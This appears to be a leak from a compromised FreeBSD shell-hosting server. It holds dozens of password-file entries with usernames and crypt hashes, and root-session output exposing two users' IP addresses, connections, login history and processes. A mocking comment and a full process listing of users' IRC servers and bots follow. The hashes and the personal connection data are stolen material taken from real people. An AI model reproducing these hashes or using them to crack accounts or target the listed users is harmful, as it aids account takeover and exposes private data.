chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
|
||
rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
|
||
wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
|
||
xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
|
||
jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
|
||
pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
|
||
mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
|
||
howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
|
||
djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
|
||
subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
|
||
dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
|
||
cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
|
||
ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
|
||
lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
|
||
chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
|
||
nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
|
||
ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
|
||
chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
|
||
jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
|
||
paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
|
||
kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
|
||
bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
|
||
grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
|
||
jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
|
||
rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
|
||
sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
|
||
lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
|
||
kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
|
||
delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
|
||
vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
|
||
darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
|
||
mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
|
||
redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
|
||
cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
|
||
cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
|
||
nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
|
||
ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
|
||
dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
|
||
visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
|
||
brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
|
||
mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
|
||
qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
|
||
kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
|
||
matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
|
||
alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
|
||
psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
|
||
brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
|
||
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
|
||
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
|
||
[root@velocity:/var/run]#
[root@velocity:/]# cat /etc/master.passwd | grep romeo
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
[root@velocity:/]# lsof -i -n | grep romeo
irssi 32525 romeo 3u IPv4 0xcc67d000 0t0 TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
irssi 32525 romeo 4u IPv4 0xc9254740 0t0 TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
irssi 32525 romeo 5u IPv4 0xc9c76cb0 0t0 TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
irssi 32525 romeo 20u IPv4 0xc5bf1ae0 0t0 TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
sshd 83595 romeo 3u IPv4 0xc58a23a0 0t0 TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
[root@velocity:/]# lsof -i -n | grep pimpinjg
sshd 82325 pimpinjg 3u IPv4 0xc5480000 0t0 TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)
[root@velocity:~]# last
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00) // RoMeO covering his tracks, once again.. lulz
||
katsst ttyp8 76.240.177.107 Thu Jun 4 18:06 - 18:06 (00:00)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:55 - 18:08 (00:12)
|
||
bollox ftp host81-129-70-1 Thu Jun 4 17:47 - 17:49 (00:01)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:44 - 17:55 (00:11)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:34 - 17:44 (00:10)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:29 - 17:34 (00:04)
|
||
smash ttyp6 88.196.163.223 Thu Jun 4 16:39 - 17:06 (00:27)
|
||
bollox ttyp9 81.129.70.166 Thu Jun 4 16:12 - 16:44 (00:32)
|
||
bollox ftp host81-129-70-1 Thu Jun 4 16:05 - 16:09 (00:04)
|
||
chaos1 ttyp8 94.195.18.213 Thu Jun 4 15:50 - 16:23 (00:32)
|
||
chaos1 ttyp6 67.86.132.29 Thu Jun 4 15:49 - 16:15 (00:26)
|
||
chaos1 ttyp6 69.143.254.180 Wed Jun 3 23:06 - 23:52 (00:45)
|
||
apo ttyp8 75.158.79.102 Wed Jun 3 12:38 - 12:44 (00:05)
|
||
apo ttyp6 75.158.79.102 Wed Jun 3 12:20 - 12:54 (00:33)
|
||
blkgraz ttyp2 70.104.27.82 Wed Jun 3 12:01 - 19:16 (2+07:15)
|
||
smash ttyp2 ntora.eml.ee Tue Jun 2 21:03 - 22:35 (01:32)
|
||
kruapra ttyp2 75.80.56.213 Tue Jun 2 20:05 - 20:35 (00:30)
|
||
katsst ttyp6 76.240.177.107 Tue Jun 2 14:30 - 15:00 (00:30)
|
||
blkgraz ttyp6 71.252.210.34 Tue Jun 2 10:39 - 11:36 (00:57)
|
||
blkgraz ttyp2 71.252.210.34 Tue Jun 2 09:51 - 18:17 (08:26)
|
||
crrj13 ttyp2 24.23.247.110 Mon Jun 1 23:54 - 00:00 (00:06)
|
||
crrj13 ttyp2 69.3.47.203 Mon Jun 1 23:19 - 23:32 (00:13)
|
||
redrum ttyp6 ist.kuscheli.ch Mon Jun 1 13:49 - 14:11 (00:21)
|
||
blkgraz ttyp2 71.252.210.34 Mon Jun 1 12:26 - 23:19 (10:53)
|
||
lordy ttyp2 76.108.112.60 Mon Jun 1 06:20 - 06:21 (00:01)
|
||
|
||
|
||
[root@velocity:~]# ps -aux | grep romeo
root 83591 0.0 0.2 5400 2068 ?? Is 9:16AM 0:00.38 sshd: romeo [priv] (sshd)
romeo 83595 0.0 0.2 5384 2120 ?? S 9:16AM 0:04.62 sshd: (sshd)
root 32336 0.0 0.1 1592 892 p2 S+ 7:39PM 0:00.00 grep romeo
romeo 20712 0.0 0.1 3272 1248 p9 Is Wed06AM 0:00.13 /usr/local/bin/bash
romeo 66004 0.0 0.7 10124 6844 p9 S+ Sat10AM 2:07.98 irssi -h absolute.ownage.net
romeo 24414 0.0 0.1 2040 1444 pf S+ 4:23PM 0:00.04 screen -r
romeo 83597 0.0 0.2 3240 1868 pf Is 9:16AM 0:00.04 -bash (bash)
[root@velocity:~]#

[root@velocity:~]# ps -aux | grep pimpinjg
root 82323 0.0 0.2 5400 2120 ?? Is 8:47AM 0:00.07 sshd: pimpinjg [priv] (sshd)
pimpinjg 82325 0.0 0.2 5384 2128 ?? I 8:47AM 0:00.35 sshd: pimpinjg@ttypd (sshd)
root 32340 0.0 0.1 1548 880 p2 R+ 7:39PM 0:00.00 grep pimpinjg
pimpinjg 29257 0.0 0.1 2040 1444 pd S+ 6:20PM 0:00.03 screen -r
pimpinjg 82327 0.0 0.2 3232 1844 pd Is 8:47AM 0:00.03 -bash (bash)
pimpinjg 20846 0.0 0.2 3268 1856 pe Is 9:24PM 0:00.05 /usr/local/bin/bash
pimpinjg 82595 0.0 0.7 10476 7720 pe S+ 8:52AM 0:16.87 irssi -h 72.20.28.206

[root@velocity:/home]# ls -la
[root@velocity:/home]# ifconfig
bge0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=1b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING>
inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
ether 00:11:11:cc:09:63
media: Ethernet 10baseT/UTP <full-duplex>
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
inet6 ::1 prefixlen 128
inet 127.0.0.1 netmask 0xff000000
[root@velocity:/home]#

[root@velocity:/usr/home]# cat /bin/vhosts
#!/usr/local/bin/bash
echo "

_ __/ /_ ____ _____/ /______
| | / / __ \/ __ \/ ___/ __/ ___/
| |/ / / / / /_/ (__ ) /_(__ )
|___/_/ /_/\____/____/\__/____/
www.vitalspeeds.com/vhosts
"

[root@velocity:~]# last root

wtmp begins Mon Jun 1 06:20:11 CDT 2009
[root@velocity:~]# last romeo
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00)

wtmp begins Mon Jun 1 06:20:11 CDT 2009
[root@velocity:~]# last pimpinjg
[root@velocity:~]# ps -aux | grep romeo
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.16 sshd: romeo [priv] (sshd)
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:01.47 sshd: (sshd)
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
romeo 51241 0.0 0.6 9296 6136 p0 S+ 11:50PM 0:10.95 irssi -h absolute.ownage.net
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.04 -bash (bash)
romeo 62761 0.0 0.1 2040 1448 p2 S+ 4:25AM 0:00.04 screen -r

[root@velocity:~]# lsof -i -n | grep romeo
irssi 51241 romeo 3u IPv4 0xca130740 0t0 TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
irssi 51241 romeo 4u IPv4 0xc58c4740 0t0 TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
irssi 51241 romeo 7u IPv4 0xca04a1d0 0t0 TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
sshd 60584 romeo 3u IPv4 0xc9e971d0 0t0 TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
[root@velocity:~]#

[root@velocity:/var/run]# ps -auxwww
|
||
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
|
||
root 10 83.0 0.0 0 8 ?? RL 27Jan08 534762:26.98 [idle]
|
||
lyhne1 85085 11.3 0.3 10700 3096 ?? S 11May09 1274:26.14 /home/lyhne1/services/services
|
||
root 0 0.0 0.0 0 0 ?? WLs 27Jan08 0:00.08 [swapper]
|
||
root 1 0.0 0.0 772 80 ?? ILs 27Jan08 21:20.52 /sbin/init --
|
||
root 2 0.0 0.0 0 8 ?? DL 27Jan08 38:47.98 [g_event]
|
||
root 3 0.0 0.0 0 8 ?? DL 27Jan08 187:53.55 [g_up]
|
||
root 4 0.0 0.0 0 8 ?? DL 27Jan08 141:20.71 [g_down]
|
||
root 5 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [kqueue taskq]
|
||
root 6 0.0 0.0 0 8 ?? DL 27Jan08 0:00.01 [thread taskq]
|
||
root 7 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_0]
|
||
root 8 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_1]
|
||
root 9 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [acpi_task_2]
|
||
root 11 0.0 0.0 0 8 ?? WL 27Jan08 3371:26.93 [swi4: clock sio]
|
||
root 12 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi3: vm]
|
||
root 13 0.0 0.0 0 8 ?? WL 27Jan08 6365:16.77 [swi1: net]
|
||
root 14 0.0 0.0 0 8 ?? DL 27Jan08 557:44.26 [yarrow]
|
||
root 15 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi6: task queue]
|
||
root 16 0.0 0.0 0 8 ?? WL 27Jan08 0:00.01 [swi6: Giant taskq]
|
||
root 17 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi5: +]
|
||
root 18 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi2: cambio]
|
||
root 19 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq9: acpi0]
|
||
root 20 0.0 0.0 0 8 ?? WL 27Jan08 5058:47.37 [irq16: bge0]
|
||
root 21 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq21: uhci0 ehci0]
|
||
root 22 0.0 0.0 0 8 ?? DL 27Jan08 0:02.22 [usb0]
|
||
root 23 0.0 0.0 0 8 ?? DL 27Jan08 0:00.00 [usbtask]
|
||
root 24 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq22: uhci1]
|
||
root 25 0.0 0.0 0 8 ?? DL 27Jan08 0:02.68 [usb1]
|
||
root 26 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq18: uhci2]
|
||
root 27 0.0 0.0 0 8 ?? DL 27Jan08 0:01.99 [usb2]
|
||
root 28 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq23: uhci3]
root 29 0.0 0.0 0 8 ?? DL 27Jan08 0:02.09 [usb3]
root 30 0.0 0.0 0 8 ?? DL 27Jan08 0:02.34 [usb4]
root 31 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq14: ata0]
root 32 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [irq15: ata1]
root 33 0.0 0.0 0 8 ?? WL 27Jan08 149:12.28 [irq20: atapci1]
root 34 0.0 0.0 0 8 ?? WL 27Jan08 0:00.60 [irq1: atkbd0]
root 35 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi0: sio]
root 36 0.0 0.0 0 8 ?? DL 27Jan08 15:56.90 [pagedaemon]
root 37 0.0 0.0 0 8 ?? DL 27Jan08 0:01.89 [vmdaemon]
root 38 0.0 0.0 0 8 ?? DL 27Jan08 98:08.61 [pagezero]
root 39 0.0 0.0 0 8 ?? DL 27Jan08 3:59.11 [bufdaemon]
root 40 0.0 0.0 0 8 ?? DL 27Jan08 519:04.35 [syncer]
root 41 0.0 0.0 0 8 ?? DL 27Jan08 5:03.46 [vnlru]
root 42 0.0 0.0 0 8 ?? DL 27Jan08 56:44.12 [softdepflush]
root 43 0.0 0.0 0 8 ?? DL 27Jan08 96:57.63 [schedcpu]
root 753 0.0 0.0 528 0 ?? IWs - 0:00.00 /sbin/devd
root 808 0.0 0.0 1376 368 ?? Ss 27Jan08 29:30.11 /usr/sbin/syslogd -s
root 905 0.0 0.0 1288 108 ?? Ss 27Jan08 0:38.65 /usr/sbin/usbd
nobody 921 0.0 0.1 2368 644 ?? Ss 27Jan08 10:21.51 proftpd: (accepting connections) (proftpd)
root 973 0.0 0.0 1444 344 ?? Is 27Jan08 9:25.16 /usr/sbin/cron -s
nodex 1211 0.0 0.1 4892 620 ?? S 27Jan08 2:16.48 ./services
nodex 1219 0.0 0.1 3408 796 ?? S 27Jan08 20:22.77 ircd: irc.nodexirc.net (ircd)
crazyl 1230 0.0 0.2 3484 1896 ?? S 27Jan08 62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
crazyl 1241 0.0 0.2 3952 2400 ?? S 27Jan08 93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
crazyl 1248 0.0 0.2 4128 2352 ?? S 27Jan08 96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
root 2937 0.0 0.0 1408 204 ?? Is 27Jan08 2:15.57 oidentd
ioplex 4479 0.0 0.2 5228 1608 ?? Ss 10Jun09 2:15.27 ./psybnc conf
roodyk 7496 0.0 0.0 4512 496 ?? Ss 26Apr09 0:34.85 ./sbnc
roodyk 7497 0.0 0.2 7760 2416 ?? S 26Apr09 2:06.67 ./sbnc --rpc-child
bluewish 8293 0.0 0.1 1580 524 ?? Ss 31Mar09 3:18.90 ./energymech
skypilot 11073 0.0 0.0 1508 0 ?? IWs - 0:00.00 ./bnc
ste 12145 0.0 0.2 3936 2368 ?? Ss 15Jun09 6:32.39 /usr/home/ste/bsd mob
ste 12182 0.0 0.2 4960 2556 ?? Ss 15Jun09 7:31.60 /usr/home/ste/bsd player
lordy 12679 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12680 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12682 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12683 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12684 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12685 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12686 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12687 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12689 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12690 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12691 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12692 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12695 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12696 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
lordy 12697 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
lordy 12701 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
crrj13 15843 0.0 0.3 5508 2696 ?? S 28Apr09 3:57.42 ircd: lambda.bitsjointirc.net (ircd)
daali 18199 0.0 0.0 2888 0 ?? IWs - 0:00.00 ./bnc bnc.conf
daali 18620 0.0 0.0 2716 0 ?? IWs - 0:00.00 ./bnc bnc.conf
scouse 19191 0.0 0.1 2956 1152 ?? S 27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
scouse 19383 0.0 0.1 7296 676 ?? S 27Nov08 0:46.99 ./services -logchan
root 21928 0.0 0.2 5476 2020 ?? Is 9:10PM 0:00.07 sshd: (sshd)
root 22109 0.0 0.2 5344 2024 ?? Ss 9:15PM 0:00.09 sshd: (sshd)
blotch 22806 0.0 1.2 18352 12200 ?? Ss 10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
shoes 25037 0.0 0.2 5092 2132 ?? S 23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
shoes 25039 0.0 0.2 5152 2160 ?? S 23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
crazyl 25232 0.0 0.3 4344 2676 ?? S 31Jan09 28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
narcissu 26686 0.0 0.1 4740 1452 ?? S 11Mar08 22:41.05 ircd: beta.pseud0.net (ircd)
smash 26960 0.0 0.2 12128 2032 ?? Ss 9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
blake96 27902 0.0 0.2 3344 1924 ?? S 8Nov08 23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
lyhne1 29482 0.0 0.1 1448 700 ?? S 2Jan09 134:02.80 ./bopm
chrirc 33440 0.0 0.1 3520 776 ?? S 12Jun08 15:34.94 ircd: irc.ChristianIRC.net (ircd)
yaquis 43784 0.0 0.1 1520 736 ?? Ss 12Jun09 0:02.72 ./bnc
devil 43953 0.0 0.1 1592 620 ?? Ss 6Jul08 75:48.71 ./energymech
smash 44333 0.0 0.2 3936 1920 ?? Ss 5May09 22:54.47 /usr/home/smash/wraith/wraith fpck
ltootle 48390 0.0 0.2 7040 2456 ?? S 26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
root 51233 0.0 0.2 2268 1784 ?? Ss 11:50PM 0:07.93 screen
lordy 51655 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51656 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
lordy 51657 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51658 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
lordy 51659 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51660 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51661 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51662 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51663 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51664 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51665 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51668 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
lordy 51669 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
y2j 53333 0.0 0.2 3296 1680 ?? S 22May09 4:05.27 ./psybnc
y2j 53335 0.0 0.3 4796 2992 ?? S 22May09 6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
y2j 53336 0.0 0.4 6032 3608 ?? S 22May09 7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
ltootle 54810 0.0 0.1 8336 992 ?? S 26Jun08 24:35.00 ./services
bruhaha 59704 0.0 0.0 1528 0 ?? IWs - 0:00.00 ./bnc
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.60 sshd: romeo [priv] (sshd)
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:09.86 sshd: (sshd)
root 63283 0.0 0.2 2332 1828 ?? Is Wed10PM 0:01.12 screen
root 64492 0.0 0.1 2772 604 ?? Is 17Jun09 4:12.85 /usr/sbin/sshd
bruhaha 67858 0.0 0.1 1544 616 ?? Ss 23Aug08 17:43.63 ./bnc
bruhaha 70843 0.0 0.0 1516 0 ?? IWs - 0:00.00 ./bnc
dealer 78536 0.0 0.1 8176 1316 ?? S 14Mar09 220:01.22 php dealbot.php
own3d 82309 0.0 0.1 2820 728 ?? Is 15Oct08 3:35.17 ./sbnc
lymelyte 88242 0.0 0.2 7720 2084 ?? Ss 29Mar09 4:33.70 ./epona
poolboy 89012 0.0 0.4 5752 3984 ?? S 8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
redrum 91676 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum 91678 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
redrum 91682 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
root 92538 0.0 0.0 0 8 ?? DL Thu08AM 0:00.08 [accounting]
root 93821 0.0 0.1 1436 844 ?? Is Thu08AM 0:00.00 inetd
root 98040 0.0 0.2 5368 2016 ?? Is 4:35PM 0:00.04 sshd: ioplex [priv] (sshd)
ioplex 98044 0.0 0.4 7364 4052 ?? I 4:35PM 0:02.03 sshd: ioplex (sshd)
crazie 98542 0.0 0.4 9732 3884 ?? S 19May09 36:58.07 ./l
crazie 98871 0.0 0.3 9236 3152 ?? S 19May09 13:26.08 ./mb2
crazie 99303 0.0 0.2 7512 2324 ?? S 19May09 7:43.22 ./mb6
root 1033 0.0 0.0 1344 0 v0 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv0
root 1034 0.0 0.0 1344 0 v1 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv1
root 1035 0.0 0.0 1344 0 v2 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv2
root 1036 0.0 0.0 1344 0 v3 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv3
root 1037 0.0 0.0 1344 0 v4 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv4
root 1038 0.0 0.0 1344 0 v5 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv5
root 1039 0.0 0.0 1344 0 v6 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv6
root 1040 0.0 0.0 1344 0 v7 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv7
darien9 2420 0.0 0.1 114060 1208 p0- S 16Mar08 799:19.15 ./psybnc
manboo 9260 0.0 0.1 3676 924 p0- S 22Apr08 20:51.79 ircd: irc.thederka.com (ircd)
manboo 11135 0.0 0.1 4288 620 p0- S 22Apr08 4:36.07 ./services
ac1115 21918 0.0 0.1 21512 1200 p0- S 2Jul08 15:39.60 ./psybnc
devil 22201 0.0 0.2 21412 1712 p0- S 2Nov08 46:45.70 ./psybnc
bpunux 27500 0.0 0.1 9476 1136 p0- S 31Oct08 9:22.64 ./psybnc
